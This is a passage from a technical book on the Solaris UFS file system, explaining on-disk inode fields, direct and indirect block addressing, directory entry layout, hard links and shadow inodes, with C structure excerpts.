the inode's ic_smode set to ISHAD. The parent's ic_shadow is then updated to point to this shadow inode. Figure 15.6 On-Disk Shadow Inode Layout 15.2.5 The Boot Block Figure 15.7 illustrates the UFS layout discussed in this section. At the start of the file system is the boot block. This is a spare sector reserved for the boot program when UFS is used as a root file system. At boot time, the boot firmware loads the first sector from the boot device and then starts executing code residing in that block. The firmware boot is file system independent, which means that the boot firmware has no knowledge about the file system. We rely on code in the file system boot block to mount the root file system. When the system starts, the UFS boot block is loaded and executed, which, in turn, mounts the UFS root file system. The boot program then passes control to a larger kernel loader, in /platform/ sun4[mud]/ufsboot, to load the UNIX kernel. Figure 15.7 UFS Layout The boot program is loaded onto the first sector of the file system at install time with the installboot(1M) command. The 512-byte install boot image resides in /usr/platform/sun4[mud]/lib/fs/ufs/bootblk in the platform-dependent directories. 15.2.6 The Superblock The superblock contains all the information about the geometry and layout of the file system and is critical to the file system state. As a safety precaution, the superblock is replicated across the file system with each cylinder group so that the file system is not crippled if the superblock becomes corrupted. It is initially created by mkfs and updated by tunefs and mkfs (in case a file system is grown). The primary superblock starts at an offset of 8192 bytes into the partition slice and occupies one file system block (usually 8192 bytes, but can be 4096 bytes on x86 architectures). The superblock contains a variety of information, including the location of each cylinder group and a summary list of available free blocks. The major information in the superblock that identifies the file system geometry is listed below. - fs_sblkno. Address of superblock in file system; defaults to block number 16. - fs_cblkno. Offset of the first cylinder block in the file system. - fs_iblkno. Offset of the first inode blocks in the file system. - fs_dblkno. Offset of the first data blocks after the first cylinder group. - fs_cgoffset. Cylinder group offset in the cylinder. - fs_cgmask. Mask to obtain physical starting fragment number of the cylinder group. - fs_time. Last time written. - fs_size. Number of blocks in the file system. - fs_dsize. Number of data blocks the in file system. - fs_ncg. Number of cylinder groups. - fs_cpg. Number of cylinders in a cylinder group. - fs_ipg. Number of inodes in a cylinder group. - fs_fpg. Number of fragments (including metadata) in a cylinder group. - fs_bsize. Size of basic blocks in the file system. - fs_fsize. Size of fragmented blocks in the file system. - fs_frag. Number of fragments in a block in the file system. - fs_magic. A magic number to validate the superblock. The file system configuration parameters also reside in the superblock. The file system parameters include some of the following, which are configured at the time the file system is constructed. You can tune the parameters later with the tunefs command. - fs_minfree. Minimum percentage of free blocks. - fs_rotdelay. Number of milliseconds of rotational delay between sequential blocks. The rotational delay was used to implement block interleaving when the operating system could not keep up with reading contiguous blocks. Since this is no longer an issue, fs_rotdelay defaults to zero. - fs_rps. Disk revolutions per second. - fs_maxcontig. Maximum number of contiguous blocks, controls the number of read-ahead blocks. - fs_maxbpg. Maximum number of data blocks per cylinder group. - fs_optim. Optimization preference, space, or time. And here are the significant logging related fields in the superblock: - fs_rolled. Determines whether any data in the log still needs to be rolled back to the file system. - fs_si. Indicates whether logging summary information is up to date or whether it needs to be recalculated from cylinder groups. - fs_clean. Is set to FS_LOG for logging file system. - fs_logbno. Is the disk block number of logging metadata. - fs_reclaim: Is set to indicate if the reclaim thread is running or needs to be run. See struct fs in usr/src/uts/common/sys/fs/ufs_fs.h for the complete superblock structure definition 15.2.7 The Cylinder Group The cylinder group is made up of several logically distinct parts. At logical offset zero into the cylinder group is a backup copy of the file system's superblock. Following that, we have the cylinder group structure, the blktot array (indicating how many full blocks are available), the blks array (representing the full-sized blocks that are free in each rotational position), inode bitmap (marking which inodes are in use), and finally, the bitmap of which fragments are free. Next in the layout is the array of inodes whose size varies according to the number of inodes in a cylinder group (on-disk inode size is restricted to 128 bytes). And finally, the rest of the cylinder group is filled by the data blocks. Figure 15.8 illustrates the layout. Figure 15.8 Logical Layout of a Cylinder Group The last cylinder group in a file system may be incomplete because the number of cylinders in a disk drive is usually not exactly rounded up to the cylinder groups. In this case, we simply reduce the number of data blocks available in the last cylinder group; however, the metadata portion of the cylinder group stays the same throughout the file system. The cg_ncyl and cg_nblk fields of the cylinder group structure guide us to the size so that we don't accidentally go out of bounds. /* * Cylinder group block for a file system. * * Writable fields in the cylinder group are protected by the associated * super block lock fs->fs_lock. */ #define CG_MAGIC 0x090255 struct cg { uint32_t cg_link; /* NOT USED linked list of cyl groups */ int32_t cg_magic; /* magic number */ time32_t cg_time; /* time last written */ int32_t cg_cgx; /* we are the cgx'th cylinder group */ short cg_ncyl; /* number of cyl's this cg */ short cg_niblk; /* number of inode blocks this cg */ int32_t cg_ndblk; /* number of data blocks this cg */ struct csum cg_cs; /* cylinder summary information */ int32_t cg_rotor; /* position of last used block */ int32_t cg_frotor; /* position of last used frag */ int32_t cg_irotor; /* position of last used inode */ int32_t cg_frsum[MAXFRAG]; /* counts of available frags */ int32_t cg_btotoff; /* (int32_t)block totals per cylinder */ int32_t cg_boff; /* (short) free block positions */ int32_t cg_iusedoff; /* (char) used inode map */ int32_t cg_freeoff; /* (uchar_t) free block map */ int32_t cg_nextfreeoff; /* (uchar_t) next available space */ int32_t cg_sparecon[16]; /* reserved for future use */ uchar_t cg_space[1]; /* space for cylinder group maps */ /* actually longer */ }; See usr/src/uts/common/sys/fs/ufs_fs.h 15.2.8 Summary of UFS Architecture Figure 15.9 puts it all together. Figure 15.9 The UFS File System
http://www.informit.com/articles/article.aspx?p=605371&seqNum=2
CC-MAIN-2019-18
refinedweb
3,073
61.46
A fussy little man in impeccable black jacket and pinstripe trousers. Mr Bent is a framework for allowing profile data to be collected in a Python application and viewed at different logical levels. The three concepts involved are a plugin, a piece of code that profiles an application, a context, a logical block of code for which you want reporting data, and a filter, a way of getting fine-grained information on where the results for a context came from. Plugins are callables that are given to the ”’mkwrapper”’ function which applies it to a function in your application. This looks like: mr.bent.wrapper.mkwrapper(foo.bar, plugincallable, "myplugin") Which will cause ”’plugincallable”’ to be called on every invocation of ”’foo.bar”’ and add the results of the plugin to the current context as ”’myplugin”’. Plugins can return either a number or an iterable. If it returns an iterable it must contain either strings or numbers. The case of returning a number is considered equivalent to returning an iterable of length 1 of numbers. A context stores data generated by plugins. At any point a new context can be started which will be a “sub-context” of the currently active context. If there is no currently active context a new top-level one will be created. Contexts are named with the dotted name of the function that they are created around, and return their data to a callback. This looks like: def mycallback(context, result, stats): return "%s <!-- %s -->" % (result, `stats`) mr.bent.wrapper.mkcontext(bar.foo, mycallback) This example would cause invocations of bar.foo, a function that returns XML, to return the XML with a repr of the context dict in a following comment. When a context ends it returns a mapping of the data it collected. As contexts are nested each time parent contexts include the data of their sub-contexts. Hence, the top level context returns the overall profiling; there is no need to manually aggregate data. A filter is, like most things in Mr. Bent, a wrapper around a function. This will default to the dotted name of the callable, but an alternative, application specific name can be used instead. This is especially useful for a function that is used to render multiple different logical blocks of content. This looks like: mr.bent.wrapper.mkfilter(take.me.to.the.foo.bar) In this example we have an application that renders a page of HTML including fragments that are logically different files which are then included into the main page. Example 1: .-------------. | Top level | `-------------' | | .--------------------. |---------| Left hand column | | `--------------------' | | | | .-------------. | |--------------| Login box | | | `-------------' | | | | | | .------------------. | `--------------| Navigation box | | `------------------' | | .-----------------. |---------| Content block | | `-----------------' | | | .---------------------. `---------| Right hand column | `---------------------' | | .----------------. `--------------| Calendar box | `----------------' In this system we have the following notional plugins (with short names for brevity): The return values may look something like this: {'t': [5, 15, 85, 25], 'd': [0, 1, 2, 8]} .-------------. | Top level | `-------------' | {'t': [5, 15], 'd': [0,1]} | .--------------------. |---------| Left hand column | | `--------------------' | | {'t': [5], 'd': [0]} | | .-------------. | |--------------| Login box | | | `-------------' | | | | {'t': [15], 'd': [1]} | | .------------------. | `--------------| Navigation box | | `------------------' | {'t': [85], 'd': [2]} | .-----------------. |---------| Content block | | `-----------------' | | {'t': [25], 'd': [8]} | .---------------------. `---------| Right hand column | `---------------------' | {'t': [25], 'd': [8]} | .----------------. `--------------| Calendar box | `----------------' Hence, the user has data at each level he has defined which he can then process as he likes. Lets see that again as a doctest (sorry Florian!): >>> from mr.bent.mavolio import create, destroy, current >>> create("top") # Create the top level context >>> create("lefthand") # Create the left hand column >>> create("login") # and the login portlet >>> current() # show that it's an empty context {} >>> current()['t'] = [5] # Simulate plugin results being added to context >>> current()['d'] = [0] >>> destroy() # Leave context {'t': [5], 'd': [0]} >>> create("nav") # Create nav >>> current()['t']=[15] >>> current()['d']=[1] >>> destroy() # Leave nav {'t': [15], 'd': [1]} >>> destroy() # Leave left hand column {'t': [5, 15], 'd': [0, 1]} >>> create("content") # Enter content block >>> current()['t'] = [85] >>> current()['d'] = [2] >>> destroy() # Leave content block {'t': [85], 'd': [2]} >>> create("righthand") # Enter right hand column >>> create("cal") # Enter calendar box >>> current()['t']=[25] >>> current()['d']=[8] >>> destroy() # Leave calendar {'t': [25], 'd': [8]} >>> destroy() # Leave right hand column {'t': [25], 'd': [8]} >>> destroy() # Leave the top level context, get totals {'t': [5, 15, 85, 25], 'd': [0, 1, 2, 8]} Utility Methods Low level.
https://pypi.org/project/mr.bent/
CC-MAIN-2016-44
refinedweb
703
62.88
>>>>> "Andreas" == Andreas Dilger <adilger turbolabs com> writes: Andreas> :- Andreas> It was just added recently (probably a devfs thing). Andreas> Before that, it just ran the "lvm_fs_setup()" (or Andreas> whatever) function, and didn't do anything with the Andreas> output. Hmm, that means my suggestion may be broken. Andreas> Need something like: Andreas> #if LINUX_KERNEL_VERSION > KERNEL_VERSION (2, 3, 38) Andreas> foo.de = #endif lvm_fs_setup(); Great thanks for the help. I'll have a look at the weekend. It anyone else with troubles wants to beat me to it, be my guest :-) Sincerely, Adrian Phillips -- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [OK]
https://www.redhat.com/archives/linux-lvm/2001-October/msg00127.html
CC-MAIN-2016-50
refinedweb
111
66.23
Thread Local Storage Many functions are not implemented to be reentrant. This means that it is unsafe to call the function while another thread is calling the same function. A non-reentrant function holds static data over successive calls or returns a pointer to static data. For example, std::strtok is not reentrant because it uses static data to hold the string to be broken into tokens. A non-reentrant function can be made into a reentrant function using two approaches. One approach is to change the interface so that the function takes a pointer or reference to a data type that can be used in place of the static data previously used. For example, POSIX defines strtok_r, a reentrant variant of std::strtok, which takes an extra char** parameter thats used instead of static data. This solution is simple and gives the best possible performance; however, it means changing the public interface, which potentially means changing a lot of code. The other approach leaves the public interface as is and replaces the static data with thread local storage (sometimes referred to as thread-specific storage). Thread local storage is data thats associated with a specific thread (the current thread). Multithreading libraries give access to thread local storage through an interface that allows access to the current threads instance of the data. Every thread gets its own instance of this data, so theres never an issue with concurrent access. However, access to thread local storage is slower than access to static or local data; therefore its not always the best solution. However, its the only solution available when its essential not to change the public interface. Boost.Threads provides access to thread local storage through the smart pointer boost::thread_specific_ptr. The first time every thread tries to access an instance of this smart pointer, it has a NULL value, so code should be written to check for this and initialize the pointer on first use. The Boost.Threads library ensures that the data stored in thread local storage is cleaned up when the thread exits. Listing Five illustrates a very simple use of the boost::thread_specific_ptr class. Two new threads are created to initialize the thread local storage and then loop 10 times incrementing the integer contained in the smart pointer and writing the result to std::cout (which is synchronized with a mutex because it is a shared resource). The main thread then waits for these two threads to complete. The output of this example clearly shows that each thread is operating on its own instance of data, even though both are using the same boost::thread_specific_ptr. Listing Six: The boost::thread_specific_ptr class. #include <boost/thread/thread.hpp> #include <boost/thread/mutex.hpp> #include <boost/thread/tss.hpp> #include <iostream> boost::mutex io_mutex; boost::thread_specific_ptr<int> ptr; struct count { count(int id) : id(id) { } void operator()() { if (ptr.get() == 0) ptr.reset(new int(0)); for (int i = 0; i < 10; ++i) { (*ptr)++; boost::mutex::scoped_lock lock(io_mutex); std::cout << id << ": " << *ptr << std::endl; } } int id; }; int main(int argc, char* argv[]) { boost::thread thrd1(count(1)); boost::thread thrd2(count(2)); thrd1.join(); thrd2.join(); return 0; } Once Routines Theres one issue left to deal with: how to make initialization routines (such as constructors) thread-safe. For example, when a global instance of an object is created as a singleton for an application, knowing that theres an issue with the order of instantiation, a function is used that returns a static instance, ensuring the static instance is created the first time the method is called. The problem here is that if multiple threads call this function at the same time, the constructor for the static instance may be called multiple times as well, with disastrous results. The solution to this problem is whats known as a once routine. A once routine is called only once by an application. If multiple threads try to call the routine at the same time, only one actually is able to do so while all others wait until that thread has finished executing the routine. To ensure that it is executed only once, the routine is called indirectly by another function thats passed a pointer to the routine and a reference to a special flag type used to check if the routine has been called yet. This flag is initialized using static initialization, which ensures that it is initialized at compile time and not run time. Therefore, it is not subject to multithreaded initialization problems. Boost.Threads provides calling once routines through boost::call_once and also defines the flag type boost::once_flag and a special macro used to statically initialize the flag named BOOST_ONCE_INIT. Listing Six illustrates a very simple use of boost::call_once. A global integer is statically initialized to zero and an instance of boost::once_flag is statically initialized using BOOST_ONCE_INIT. Then main starts two threads, both trying to initialize the global integer by calling boost::call_once with a pointer to a function that increments the integer. main waits for these two threads to complete and writes out the final value of the integer to std::cout. The output illustrates that the routine truly was only called once because the value of the integer is only one. Listing Six: A very simple use of boost::call_once. #include <boost/thread/thread.hpp> #include <boost/thread/once.hpp> #include <iostream> int i = 0; boost::once_flag flag = BOOST_ONCE_INIT; void init() { ++i; } void thread() { boost::call_once(&init, flag); } int main(int argc, char* argv[]) { boost::thread thrd1(&thread); boost::thread thrd2(&thread); thrd1.join(); thrd2.join(); std::cout << i << std::endl; return 0; } The Future of Boost.Threads There are several additional features planned for Boost.Threads.. Boost.Threads has been presented to the C++ Standards Committees Library Working Group for possible inclusion in the Standards upcoming Library Technical Report, as a prelude to inclusion in the next version of the Standard. The committee may consider other threading libraries; however, they viewed the initial presentation of Boost.Threads favorably, and they are very interested in adding some support for multithreaded programming to the Standard. So, the future is looking good for multithreaded programming in C++. References [1] The POSIX standard defines multithreaded support in whats commonly known as the pthread library. This provides multithreaded support for a wide range of operating systems, including Win32 through the pthreads-win32 port. However, this is a C library that fails to address some C++ concepts and is not available on all platforms. [2] Visit the Boost website at. [3] See Bjorn Karlsson's article, Smart Pointers in Boost, C/C++ Users Journal, April 2002. [4] Douglas Schmidt, Michael Stal, Hans Rohnert, and Frank Buschmann. Pattern-Oriented Software Architecture Volume 2 Patterns for Concurrent and Networked Objects (Wiley, 2000). William E. Kempf received his BS in CompSci/Math from Doane College. Hes been in the industry for 10 years and is currently a senior application developer for First Data Resources, Inc. He is the author of the Boost.Threads library, and an active Boost member. He can be contacted at wekempf@cox.net.
http://www.drdobbs.com/cpp/the-boostthreads-library/184401518?pgno=4
CC-MAIN-2015-32
refinedweb
1,184
53.71
>From: "Dan A. Dansereau" <address@hidden> >Organization: Utah State University >Keywords: 200203141936.g2EJa6a06867 McIDAS DEC OSF/1 Dan, re: >I have regenerate a new op system, ldm, and mcidas >anyway before I started "fixing it" I thought you could >look at it, Things seem to be working correctly on tornado: o the LDM is ingesting and decoding IMAGE, POINT, GRID and TEXT data from allegan o XCD decoders are processing the data and writing the output into /var/data/ldm/xcd o and McIDAS is setup to view the data being ingested by ADDE Here is a list of things that I did: LDM 1) logon as the user 'ldm' 2) stop the LDM: ldmadmin stop 3) edit the Bourne shell scripts batch.k, mcscour.sh, and xcd_run: cd decoders o make sure that all three scripts declare SHELL to be 'sh' and export that definition o make sure that all three scripts correctly set MCDATA, MCPATH, MCGUI, etc o modify PATH and LD_LIBRARY_PATH environment variables to remove SunOS specific settings 4) modify ldmd.conf to remove startup of pqexpire (not needed in LDM 5.1.x) 5) modify pqact.conf to remove unneeded decode actions and add 3 new actions that will be used if/when you start ingesting the FNEXRAD feed. In LDM 5.1.2, FNEXRAD was not yet understood, so the feed type I used in pqact.conf was NMC3. This will remain OK when you upgrade your LDM, but at some point you will want to change the NMC3 use to FNEXRAD as it is more clear as what feed is being acted on McIDAS 1) logon as the user 'mcidas' 2) verify that the environment variable definitions in ~mcidas/.cshrc are correct. The McIDAS definitions were OK, but the setting of the PATH was not: change: set path = ( /sbin /usr/sbin /usr/bin /usr/bin/X11 . ) to: if ( ! ${?path} ) then set path = ( /sbin /usr/sbin /usr/bin /usr/bin/X11 . ) endif I believe that this was a BIG cause of the problems you originally reported. What happens is that when a McIDAS session is started, a routine called 'mcenv' is actually run. If the user runs under the C shell, .cshrc is sourced. Given the 'path' setting that was in your .cshrc file, and given the construct in the McIDAS environment variable setting that guards against 'path' from getting continually reset, you would lose the /home/mcidas/bin directory in 'path', and then subsequent attempts to do McIDAS things (list, plot, etc.) would fail since the executables would not be found. 3) remove the copies of LWPATH.NAM, STRTABLE, and SKEDFILE in /home/mcidas 4) remove the copies of ALLOC.WWW, RESOLV.SRV, and STRTABLE in /home/mcidas/mcidas7.8/data (created during test phase, but not needed anymore) 5) setup LOCAL.NAM, LSSERVE.BAT, and LOCDATA.BAT: cd ~mcidas/data edit LOCAL.NAM: change all occurrances of /var/data/xcd to /var/data/ldm/xcd (numerous) edit LSSERVE.BAT comment out all definitions for datasets that you will most likely never host on your machine (e.g., WNEXRAD, WNOWRAD). Commenting out the definitions is done by adding a 'REM ' to each line that defines a group/descriptor pair edit LOCDATA.BAT change DATALOCs to point at external machines for all of those datasets that you will likely never have locally (e.g., GINICOMP, GINIEAST, GINIWEST, NEXRCOMP (you may eventually host NEXRCOMP)) NOTE: I added a new dataset to your LOCDATA.BAT file. The dataset is for composite NEXRAD reflectivity products. This dataset will be announced either this week or the next, but I wanted to give you a jump on it. 6) make the REDIRECTions specified in LOCAL.NAM active: cd ~mcidas/workdata <- NB: I CD to the directory first rm LWPATH.NAM redirect.k REST LOCAL.NAM 7) remove previous ADDE dataset definitions and define those setup in LSSERVE.BAT: cd ~mcidas/workdata rm RESOLV.SRV batch.k LSSERVE.BAT 8) remove previous DATALOC definitions and then define them as specified in LOCDATA.BAT: cd ~/mcidas/data rm ADDESITE.TXT cd ~mcidas/workdata <- NB: I CD to the directory first batch.k LOCDATA.BAT 9) make sure that the McIDAS environment string XCDDATA is defined in the McIDAS string table: cd ~mcidas/workdata <- NB: I CD to the directory first te.k XCDDATA \"/var/data/ldm/xcd 10) run the scripts that setup XCD decoding: batch.k XCD.BAT batch.k XCDDEC.BAT 11) I will be releasing a new addendum for McIDAS soon. I uploaded some of the routines that are in the new addendum to your system so you could begin looking at the NEXRAD composite imagery now. Back to LDM 6) I noticed that you had copied SATANNOT and SATBAND from either the McIDAS distribution or from the ldm-mcidas distribution to the /var/data/ldm/xcd directory. This is not needed, so I moved them to the /home/ldm/etc directory. These files are used by the ldm-mcidas pnga2area decoder. Their existence in ~ldm/etc are not needed for sites that are setup so that the HOME directory for 'mcidas' is /home/mcidas (like yours is). On other systems, I advise users to put the files in ~ldm/etc, and they would have to tell pnga2area where to find the files through '-a' and '-b' flags on the pqact.conf pnga2area invocation line. 7) verify that the mods I made to pqact.conf do not have errors and then restart the LDM: ldmadmin pqactcheck -- if no errors are found -- ldmadmin start OK, so that got things rolling! I made, however, a couple more changes on your system: McIDAS 1) edit the McIDAS ADDE remote server environment file to setup logging of ADDE transactions: cd ~mcidas edit .mcenv add ADDE_LOGGING=YES and export that setting 2) add a REDIRECTION for the ADDE remote server log file so that it will be read/written in the ~ldm/logs directory: cd ~mcidas/workdata redirect.k ADD SERVER.LO\* \"/var/data/ldm/logs touch /var/data/ldm/logs/SERVER.LOG chmod 666 /var/data/ldm/logs/SERVER.LOG LDM 1) setup rotation of the ADDE remote server logs to cron: setenv EDITOR vi crontab -e <add> # # Rotate ADDE access log files just past 12 midnight on first day of month # 1 0 1 * * /home/ldm/bin/newlog logs/SERVER.LOG 3; chmod 666 logs/SERVER.LOG After setting up ADDE server logging, you can easily see who is looking at data through your remote server: <login as 'mcidas'> cd workdata addeinfo.k The default execution of addeinfo.k just lists machines that have used your remote server, and how much data they transferred. addeinfo.k has other modes that allow you to see exactly what the external process was getting. Check out the online help for ADDEINFO for more information. Wrap-up: The changes I made were basically: 1) setup the McIDAS environment stuff in ~mcidas/.cshrc (and correct anything that was wrong there) 2) setup LOCAL.NAM, LSSERVE.BAT, and LOCDATA.BAT in ~mcidas/data 3) remove existing ADDE dataset definitions, file REDIRECTIONs, and DATALOCs so that the new setup in the files in 2) would be all that there is 4) define needed REDIRECTions, ADDE dataset definitions, and DATALOCs 5) setup ADDE server logging in McIDAS 6) tidy up the Bourne shell scipts in ~ldm/decoders 7) tidy up the entries in ~ldm/etc/ldmd.conf and ~ldm/etc/pqact.conf 8) stop and restart the LDM (at the appropriate times) 9) update your McIDAS distribution with some new source code and ancillary data files. This step was not needed to get you going at all. I did it so you could look at the NEXRCOMP NEXRAD composite images Almost all of the steps above are what is presented in the online McIDAS documentation, or, at least, it is what I am trying to present. I think that your setup went "south" for two simple reasons: o an errant 'path' definition in ~mcidas/.cshrc o an editing mistake in ~mcidas/data/LOCAL.NAM (/data/ldm/xcd instead of /var/data/ldm/xcd) Please let me know if you have any problems. In particular, please let me know what happens when you try to start the McIDAS MCGUI interface: <login as 'mcidas'> <set your DISPLAY environmet variable> mcidas If you are setting up any user accounts, you may well have to take a hard look at their ~/.cshrc file if it sets 'path' like what was done in the 'mcidas' .cshrc file. I want to get this off to you so you can take a look... Tom Date: Sun, 17 Mar 2002 16:40:28 MST To: Tom Yoksas <address@hidden> From: "Dan A. Dansereau" <address@hidden> Subject: RE: 20020317: McIDAS-X/XCD installation and configuration on DEC OSF/1 5.1 Tom Thanks much - I took a quick glance at your notes - the only major error was that I had chaged the drive /var/data... paths just before I turned it over to you - and had not updated the NAM file - sorry. I will go thru everything - and give a wrap up later today/or in the AM again - thanks much - you do GOOD WORK!!!!! Dan.
https://www.unidata.ucar.edu/support/help/MailArchives/mcidas/msg01821.html
CC-MAIN-2022-40
refinedweb
1,537
63.39
Software Engineer/Blogger If you have not read the first blog on the why, how, and hope of this series, check out the first here I think the biggest reason why I have chosen Python 3 over Python 2 is that starting this year, there will be no maintaining of Python 2 and almost no more bug fixes (see more here on Python’s official documentation). Thus, I’ve decided to go ahead and code in Python 3 for the remainder of this series. Now, with that comes an interesting question: what’s changed between versions? What I’ve seen on the internet and many of blog posts, it’s a few things that come to mind: # Python 2 verison of print >>> print "Hello World" Hello World # Python 3 version of print - print is now a function >>> print("Hello World") Hello World print statements in Python3 #Python 2 - range([start - optional], stop, [step - optional]) vs. xrange([start - optional], stop, [step - optional]) #range gives you a python list of values that you can iterate through immediately >>> a = range(1,100) >>> print "%s" % a [0,1,2,3,....99] #xrange gives you back an object that evaluates lazily 👉🏾 (as you need it/on-demand) - good for memory >>> b = xrange(1,100) >>> print(b) xrange(1,100) >>> for i in b: >>> print "%d" % i [0,1,2,3,....99] #Python 3 - there is no more xrange! Just 1 range to rule them all (range in Python 3 includes xrange) >>> c = range(1,100) >>> print(c) range(1,100) # if you want to make a list out of the range object >>> new_c = list(c) >>> print(new_c) [0,1,2,3,....99] range vs xrange in Python -> see more explanation at this stack Overflow post 👉🏾 #Python 2 - watch out for values that evaluate to float data types! >>> num1 = 1/2 >>> print "num" 0 #Python 3 - you'll get a float value >>> num2 = 1/2 >>> print(num2) 0.5 float handling in Python3 While this is not at all an exhaustive list, I hope this gives an idea of somethings that have changed from Python 2 to Python 3. Ultimately, if you are working on a legacy system of some sort, you might have to switch to Python 2 so the best case scenario is to be comfortable with both versions 😃. Seeing as the blog posts will focus on the understanding and implementation of data structures and algorithms, I think it’s important to explain a fundamental part of any object-oriented programming language, and that’s classes. Rather than give you a definition first, it may be easier to think about a picture. Let’s think about your standard calculator. Photo by StellrWeb on Unsplash A calculator has many different functions that a person has access to. A person can come to the calculator with their given numbers and add, subtract, multiply, divide and (depending on if it’s a fancy calculator) also plot graphs, utilize charts, and much more. A class in python is no different than a calculator. You can think of a class as an interface with defined functionality and attributes (the calculator’s job is not to tell you the weather 👉🏾 it’s to crunch numbers) to be accessed through an object (your finger would be the object, in this case, accessing the functionality of the calculator, providing the input in numbers and operations and the calculator gives you the desired output). This can take you down a rabbit hole of examples when you think it through (a car can be considered a class, the remote you use for you tv can be considered a class, the possibilities and internet are endless with examples 😂). We’ll choose to stay above ground and see what this simple example looks like in code 😃 class Calculator: def __init__(self, num1, num2): self.num1 = num1 self.num2 = num2 Consider this like the laying of groundwork for the Class The def __init__ is considered to initialize the class¹. Most, if not all classes have this at the top of the class file. You might be wondering about the self in the argument list. This took me a while to figure out when first learning object-oriented programming but in a nutshell, the self is “used to refer to the object being created at the moment” of initialization¹. Num1 and Num2 are both considered as attributes and more so represent how you can extend your class (you don’t have to use the same two numbers every single time you use your calculator). def add(self, n1, n2): return (n1 + n2) def subtract(self, n1, n2): return (n1 - n2) def multiply(self, n1, n2): return (n1 * n2) #remember in Python3 from above, you'll get out floats if you pass two integers def divide(self, n1, n2): return (n1/n2) Rest of the functionality of the Calculator class The add, subtract, multiply, and divide functions above would be considered the actual “buttons” that a user of the calculator would physically press for the desired usage. These functions work in the exact same way! Once you create your object, you can then access the class functions via the object as you can see below 👇🏾 class Calculator: def __init__(self, num1, num2): self.num1 = num1 self.num2 = num2 def add(self): return (self.num1 + self.num2) def subtract(self): return (self.num1 - self.num2) def multiply(self): return (self.num1 * self.num2) def divide(self): return (self.num1/self.num2) Final Calculator.py file you would save # assuming you have saved the above code to a .py file in the same directory of launching python interpreter or ipython >>> cal_object1 = Calculator(4,5) #cal_object1 is now the object that you will use to access the functions/methods in the Calculator class >>> cal_object1.add() 9 >>> cal_object1.multiply() 20 >>> cal_object1.subtract() -1 >>> cal_object1.divide() 0.8 >>> cal_object1.num1 4 >>> cal_object1.num2 5 # The flexible part about creating a class is assigning different attributes (or in our case numbers) # all you have to do is create a new object! >>> cal_object2 = Calculator(10,20) >>> cal_object2.add() 30 Object creation using Calculator.py GIF from If this example makes sense and you are solid on the information, you did it! Pat yourself on the back 😃. Being comfortable with classes moving through the series is very important as the data structures and algorithms that we will be invoking are not native to Python (or really any other language), therefore they will need to be built before implemented. Seeing as the only way to get better is through practice, I will be posting some programming problems sometime next week via online flashcards that I will share publicly so you can practice your programming anywhere. Until next time! 👋🏾 If your interest was peaked and/or have been in encouraged/helped by this blog post, follow me on Twitter (@jeff_ridgeway4)! References: [1] Shovic, John C, and Alan Simpson. “Doing Python with Class.” Python All-In-One For Dummies, John Wiley & Sons, Inc., 2019, pp. 213–220. Photo by Hitesh Choudhary on Unsplash Previously published at
https://hackernoon.com/re-learning-data-structures-and-algorithms-series-python-3-and-classes-jz2h377i
CC-MAIN-2022-21
refinedweb
1,176
60.04
pthreadAPI I’ve described several ways to write a TCP server: socketsystem calls, serving one client at a time forksystem call to serve multiple clients (one client per process) selectsystem call to serve multiple clients kqueuesystem calls to serve multiple clients Today I’ll describe another: using the pthread library to serve multiple clients. The pthread functions are not system calls, but they are part of the standard POSIX API. (In future, I’ll describe how pthreads are implemented on top of system calls.) The library in pthread.h includes many functions, but today we’ll just use the most fundamental one: #include <pthread.h> int pthread_create(pthread_t *thread, const pthread_attr_t *attr, void *(*start_routine)(void *), void *arg); The pthread_create function is somewhat like the fork system call: it creates two threads of control where previously there was one. The important differences today are: forksystem call starts the new process at the same program counter as the old process. But the pthread_createfunction takes a function pointer, and starts the new thread at that position. forksystem call clones the file descriptor table for the new process. The pthread_createfunction does not; instead, the thread shares the same file descriptor table. Here’s the program, which runs an “echo” server for every TCP client, using pthread_create for each new TCP connection: #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <pthread.h> int guard(int r, char * err) {if (r == -1) { perror(err); exit(1); } return r; } void * thread_func(void * arg) { intptr_t conn_fd = (int) arg; printf("thread: serving fd %ld\n", conn_fd); char buf[1024]; for (;;) { int bytes_received = guard(recv(conn_fd, buf, sizeof(buf), 0), "Could not recv"); if (bytes_received == 0) { goto stop_serving; } int bytes_sent = 0; while (bytes_sent < bytes_received) { ssize_t bytes_sent_this_call = send(conn_fd, buf+bytes_sent, bytes_received-bytes_sent, 0); if (bytes_sent_this_call == -1) { goto stop_serving; } bytes_sent += bytes_sent_this_call; } } stop_serving: guard(close(conn_fd), "Could not close socket"); printf("thread: finished serving %ld\n", conn_fd); return NULL; } int main(void) { int listen_fd = guard(socket(AF_INET, SOCK_STREAM, 0), "Could not create TCP listening socket"); guard(listen(listen_fd, 100), "Could not listen"); struct sockaddr_in addr; socklen_t addr_bytes = sizeof(addr); guard(getsockname(listen_fd, (struct sockaddr *) &addr, &addr_bytes), "Could not get sock name"); printf("Listening on port %d\n", ntohs(addr.sin_port)); for (;;) { intptr_t conn_fd = guard(accept(listen_fd, NULL, NULL), "Could not accept"); pthread_t thread_id; int ret = pthread_create(&thread_id, NULL, thread_func, (void*) conn_fd); if (ret != 0) { printf("Error from pthread: %d\n", ret); exit(1); } printf("main: created thread to handle connection %ld\n", conn_fd); } return 0; } I wrote this because I felt like it. This post is my own, and not associated with my employer.Jim. Public speaking. Friends. Vidrio.
https://jameshfisher.github.io/2017/02/28/tcp-server-pthreads.html
CC-MAIN-2019-18
refinedweb
447
51.58
getnstr, getstr, mvgetnstr, mvgetstr, mvwgetnstr, mvwgetstr, wgetstr, wgetnstr - get a multi-byte character string from the terminal #include <curses.h> int getnstr(char *str, int n); int getstr(char *str); int mvgetnstr(int y, int x, char *str, int n); int mvgetstr(int y, int x, char *str); int mvwgetnstr(WINDOW *win, int y, int x, char *str, int n); int mvwgetstr(WINDOW *win, int y, int x, char *str); int wgetnstr(WINDOW *win, char *str, int n); int wgetstr(WINDOW *win, char *str); The effect of getstr() is as though a series of calls to getch() were made, until a newline, carriage return or end-of-file is received. The resulting value is placed in the area pointed to by str. The string is then terminated with a null byte. The getnstr(), mvgetnstr(), mvwgetnstr() and wgetnstr() functions read at most n bytes, thus preventing a possible overflow of the input buffer. The user's erase and kill characters are interpreted, as well as any special keys (such as function keys, home key, clear key, and so on). The mvgetstr() function is identical to getstr() except that it is as though it is a call to move() and then a series of calls to getch(). The mvwgetstr() function is identical to getstr() except it is as though a call to wmove() is made and then a series of calls to wgetch(). The mvgetnstr() function is identical to getnstr() except that it is as though it is a call to move() and then a series of calls to getch(). The 